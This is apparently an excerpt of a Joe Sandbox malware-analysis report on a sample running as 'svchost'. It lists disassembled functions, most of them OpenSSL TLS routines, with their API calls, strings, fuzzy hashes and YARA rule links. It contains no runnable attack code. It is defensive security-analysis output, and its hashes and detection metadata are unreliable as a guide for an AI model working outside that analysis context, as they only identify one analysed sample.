                                                                                              • Instruction ID: 48499649b9ca7d9a1e42feedbe1467a9752f99a6b341db9b609f31372855818e
                                                                                              • Opcode Fuzzy Hash: c6dfb0372a35b94570650d86b783ddb20b63f58534f8dc10c92d57d746d52ad2
                                                                                              • Instruction Fuzzy Hash: F8011BB2A0B141CBE7A7DB75C4957BC2790EB44B48F588435CE2C8A6A1DF2CA9C6C611
                                                                                              Function 64941C70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 64941C95
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 64941CD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentThread
                                                                                              • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                                                                                              • API String ID: 2882836952-884133013
                                                                                              • Opcode ID: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                                                                                              • Instruction ID: a46da822108b5d6275fe5987b69bee3bdd31e53238ff1fe5d77ed74437cca604
                                                                                              • Opcode Fuzzy Hash: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                                                                                              • Instruction Fuzzy Hash: 6B018F7A38470086EB10DF26F840B4A3BA5F399F98F048225DD4C43710EB39C526C710
                                                                                              Function 00007FFBAB41E19B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$RC2(128)$SHA256
                                                                                              • API String ID: 3142812517-4065257412
                                                                                              • Opcode ID: ec9a1fd387941a3c2f00c79377d3d867282fdbe4ba62111515321fb465be5215
                                                                                              • Instruction ID: 2e6aad7903663a8ba1399f85a51017368b632e6112d4b5c33384acbf4f3ec462
                                                                                              • Opcode Fuzzy Hash: ec9a1fd387941a3c2f00c79377d3d867282fdbe4ba62111515321fb465be5215
                                                                                              • Instruction Fuzzy Hash: F5019AB6C4E68A81E2728735F4450A9A7A0FB40750F448137EDAC13A788F3DE941D200
                                                                                              Function 00007FFBAB41E1A7 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$IDEA(128)$SHA256
                                                                                              • API String ID: 3142812517-2241050542
                                                                                              • Opcode ID: 3500ee2869abb935871492220813c3d45dcff8058647e0efeab3f62648fd7570
                                                                                              • Instruction ID: 746107fa7ca61b3a920ae003f94c0a29bd1eab6c2c709e9f2d26f109194c12f0
                                                                                              • Opcode Fuzzy Hash: 3500ee2869abb935871492220813c3d45dcff8058647e0efeab3f62648fd7570
                                                                                              • Instruction Fuzzy Hash: B2019AB6C4E68A81E2728735F4450A9A7A0FB40750F488137EDAC13A788F3DED41D244
                                                                                              Function 00007FFBAB41E177 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$DES(56)$SHA256
                                                                                              • API String ID: 3142812517-3620607540
                                                                                              • Opcode ID: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction ID: 54f6180ebb8b1ab0df11733e37ed36cd3063374c7ee17fff165a30a4a25a8bba
                                                                                              • Opcode Fuzzy Hash: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction Fuzzy Hash: E7019AB6C4E68A81E2728735F4450A9A7A0FB40750F448137EDAC13A788F3DE991D200
                                                                                              Function 00007FFBAB41E18F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$RC4(128)$SHA256
                                                                                              • API String ID: 3142812517-1386952729
                                                                                              • Opcode ID: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction ID: 592b12f1a067c901fcfb57467b18c5bde1e184e1ee9c125425c5054dcd397fe3
                                                                                              • Opcode Fuzzy Hash: 23d6b098104fdcf4299d09d061bccc979f89490e296102d26d9a84bde5bebe8b
                                                                                              • Instruction Fuzzy Hash: E3019AB6C4E68A81E2728735F4450AAA7A0FB40750F448137EDAC13A788F3DE941D200
                                                                                              Function 00007FFBAB41E183 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_snprintf
                                                                                              • String ID: %-30s %-7s Kx=%-8s Au=%-5s Enc=%-22s Mac=%-4s$3DES(168)$SHA256
                                                                                              • API String ID: 3142812517-1945505136
                                                                                              • Opcode ID: 511d42cbf8a54ebef7692f5742980d996ed1f35e61bb5bb9d41387b9466817a4
                                                                                              • Instruction ID: 5b1386a698503138e07b3da3fda07b8bd93d1d2178a98ab49c394159c76661c7
                                                                                              • Opcode Fuzzy Hash: 511d42cbf8a54ebef7692f5742980d996ed1f35e61bb5bb9d41387b9466817a4
                                                                                              • Instruction Fuzzy Hash: 87019AB6C4E68A81E2728735F4450A9ABA0FB40750F448137EDAC13A788F3DE941D200
                                                                                              Function 00007FFBAB4767D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_increment_sequence_ctr
                                                                                              • API String ID: 193678381-4116607248
                                                                                              • Opcode ID: 1c3c50427a3f35b97d7c239b30150f931c64e864396e14f676402aef77204413
                                                                                              • Instruction ID: bae96aa21cd1294fb82c532d1feb1a0c3833d8c3a3ee6f970c146af61584c123
                                                                                              • Opcode Fuzzy Hash: 1c3c50427a3f35b97d7c239b30150f931c64e864396e14f676402aef77204413
                                                                                              • Instruction Fuzzy Hash: 92F081A1E1714146FB5397B5D8526F822519F94720F84C631CE3C427E2EE6C99C5C350
                                                                                              Function 00007FFBAB441090 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf
                                                                                              • String ID: %02X$%s (len=%d):
                                                                                              • API String ID: 601296420-4138326432
                                                                                              • Opcode ID: 36ce234d46d02148adacb22844c03ffa6f053384a5186d88df06f53ea04c3649
                                                                                              • Instruction ID: 134997aca158a5eed0dc94caf7e6a216d6abc4e0a66ef7fab081dc2ac2009ba0
                                                                                              • Opcode Fuzzy Hash: 36ce234d46d02148adacb22844c03ffa6f053384a5186d88df06f53ea04c3649
                                                                                              • Instruction Fuzzy Hash: 7601D4A1B5EB9285EA22DB66E58006CA711EB44FC0F089031EE5C07B6ACF6CD4068700
                                                                                              Function 00007FFBAB4982A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ossl_statem_server_process_message$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 193678381-722880742
                                                                                              • Opcode ID: b17f0a67d53f0966aecb426769ce5c119c87242601565f59d85da2248e087f37
                                                                                              • Instruction ID: e229eacfc1d514b156cb65986a206aa1e0f9f6892fe4285ed36a79a125531e3d
                                                                                              • Opcode Fuzzy Hash: b17f0a67d53f0966aecb426769ce5c119c87242601565f59d85da2248e087f37
                                                                                              • Instruction Fuzzy Hash: C0F0F461A5A18286D602D775E8916BC6710AF44788F448532EF6C872F3DE3CE5468700
                                                                                              Function 00007FFBAB494A90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_construct_key_update
                                                                                              • API String ID: 1390262125-2630406174
                                                                                              • Opcode ID: 65d52cba1d89d2184b94278aeb36dc7ab1b11dbce64f3e7fa5f1c36f01e04e7a
                                                                                              • Instruction ID: e3d6e9a1cfab71bc9b757ac423e61c3d9bd8692cb58af241efd4e8eb345baa81
                                                                                              • Opcode Fuzzy Hash: 65d52cba1d89d2184b94278aeb36dc7ab1b11dbce64f3e7fa5f1c36f01e04e7a
                                                                                              • Instruction Fuzzy Hash: 2DF0B4E1F4A24382F762A7B7D9927F812409F44790F448431DD3C87BE2EE6D95D54710
                                                                                              Function 64941440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                              • API String ID: 1646373207-328863460
                                                                                              • Opcode ID: bc905c6d137a0c53196b9c0bd09bc0aeaa0806cc2f24fc447d6273a82a917542
                                                                                              • Instruction ID: 41b3a94f408f7bae3b9d725e5a4e0a0769d76ac245e5e7c58dbb607d6e734eb2
                                                                                              • Opcode Fuzzy Hash: bc905c6d137a0c53196b9c0bd09bc0aeaa0806cc2f24fc447d6273a82a917542
                                                                                              • Instruction Fuzzy Hash: 64F05E107D2A04D5FE19DF72E88A37127E6AB56788FC40526841D063A0EF3DC276C320
                                                                                              Function 00007FFBAB48A8FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A92F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A947
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A98D
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A9A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: set_client_ciphersuite$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 4275876640-3316213183
                                                                                              • Opcode ID: e987dac0bce8b29c2390622b79a2f18fa0c291ade97ad151bb8bc7c638c4f201
                                                                                              • Instruction ID: e96189090f666b4316ce0af22d0f85da212791ef152165a0e69f810357469a7f
                                                                                              • Opcode Fuzzy Hash: e987dac0bce8b29c2390622b79a2f18fa0c291ade97ad151bb8bc7c638c4f201
                                                                                              • Instruction Fuzzy Hash: 10F02BA2B1A64244E352E776E4427BD1350DF487C0F448431EE2C43BA3DD3DD4454740
                                                                                              Function 00007FFBAB494840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_construct_change_cipher_spec
                                                                                              • API String ID: 1390262125-1264406544
                                                                                              • Opcode ID: 4c33a64a7ef8f1b7b3c829877a7a0917372e19b8aa19b288ad8304aa62e7efac
                                                                                              • Instruction ID: 0459a758b54eeee1e0cfe2eb5d620b506fa10208c5b5b9f6fe7184b76219266a
                                                                                              • Opcode Fuzzy Hash: 4c33a64a7ef8f1b7b3c829877a7a0917372e19b8aa19b288ad8304aa62e7efac
                                                                                              • Instruction Fuzzy Hash: 85F01CE1F1A14286FB67A3B2D8927F912409F98780F448831DE2CC77A2EE6DA5D64750
                                                                                              Function 00007FFBAB489000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ossl_statem_client_construct_message$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 193678381-2151371605
                                                                                              • Opcode ID: dc44a18737892bb6ca68322c2d90c9761d0f3f508ca1e12f43bb6e69322129c0
                                                                                              • Instruction ID: b7aba156e9c4a21ffab01cb3ae60b34ec036141e5f07e26eb3f323ed36da42b1
                                                                                              • Opcode Fuzzy Hash: dc44a18737892bb6ca68322c2d90c9761d0f3f508ca1e12f43bb6e69322129c0
                                                                                              • Instruction Fuzzy Hash: 17F090A2E4A54286E31293B5D886AF82750DF44798F44C931EE2D877F2DE1D96878200
                                                                                              Function 00007FFBAB48CB90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_end_of_early_data
                                                                                              • API String ID: 1390262125-1184863746
                                                                                              • Opcode ID: 0c5cd1865cee1c296b5e24ba19347e5ad3a2e43974ec7d2134c3ec4f50494873
                                                                                              • Instruction ID: edd2aa5e3bf0b396d4b412140a7ae1bb612e7e1b9f309a30aab3320f5275cc73
                                                                                              • Opcode Fuzzy Hash: 0c5cd1865cee1c296b5e24ba19347e5ad3a2e43974ec7d2134c3ec4f50494873
                                                                                              • Instruction Fuzzy Hash: E4F082E1E1A18283E352DBB5D8867F822509F44754F48C931DE2C876F2DE6DA9CA8710
                                                                                              Function 00007FFBAB48815C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB488171
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB488189
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: read_state_machine$ssl\statem\statem.c
                                                                                              • API String ID: 1390262125-2676740512
                                                                                              • Opcode ID: ed3bc549ff9b318cf91dc269b9fb4ae0094196de91c5771c2781463e6c9ae1fe
                                                                                              • Instruction ID: ef8c3edff01fd83b770f6a8d19198fdc43a68a880b138104fc2c28de81d6f6a1
                                                                                              • Opcode Fuzzy Hash: ed3bc549ff9b318cf91dc269b9fb4ae0094196de91c5771c2781463e6c9ae1fe
                                                                                              • Instruction Fuzzy Hash: DBF08262B1E68245FB539775E9917BD17109B49768F448432CF6D469E3DD3C848A8300
                                                                                              Function 00007FFBAB440F6D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BIO_indent.LIBCRYPTO-3-X64 ref: 00007FFBAB440FAA
                                                                                              • BIO_printf.LIBCRYPTO-3-X64 ref: 00007FFBAB440FDD
                                                                                                • Part of subcall function 00007FFBAB441090: BIO_printf.LIBCRYPTO-3-X64(?,00007FFBAB43ECDD), ref: 00007FFBAB4410D4
                                                                                                • Part of subcall function 00007FFBAB441090: BIO_printf.LIBCRYPTO-3-X64(?,00007FFBAB43ECDD), ref: 00007FFBAB4410EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
